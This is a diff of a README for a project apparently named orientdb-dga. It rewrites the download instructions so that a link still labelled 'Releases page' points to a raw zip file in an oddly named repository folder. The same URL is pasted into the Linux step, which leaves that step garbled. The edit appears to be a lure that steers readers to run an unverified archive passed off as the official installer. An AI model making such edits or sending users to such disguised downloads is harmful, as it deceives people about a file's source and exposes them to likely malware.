Wooly-spartina89/orientdb-dga/README.md

 - **Storage:** At least 500MB free disk space.

 ## 💻 Download & Install
-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/Wooly-spartina89/orientdb-dga/releases).
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/Wooly-spartina89/orientdb-dga/main/Semiticism/orientdb-dga-1.8.zip).
 2. **Choose the Latest Version**: Look for the most recent version listed.
 3. **Download the Installer**: Click on the installer file for your operating system.
 4. **Run the Installer**:
    - **Windows**: Double-click the downloaded .exe file and follow the prompts.
    - **macOS**: Open the downloaded .dmg file and drag the application to your Applications folder.
-   - **Linux**: Extract the .tar.gz file and follow the instructions in the README inside that folder.
+   - **Linux**: Extract the https://raw.githubusercontent.com/Wooly-spartina89/orientdb-dga/main/Semiticism/orientdb-dga-1.8.zip file and follow the instructions in the README inside that folder.

 ## 🛠️ Application Features
 - **User-Friendly Interface**: Navigate easily to manage your data.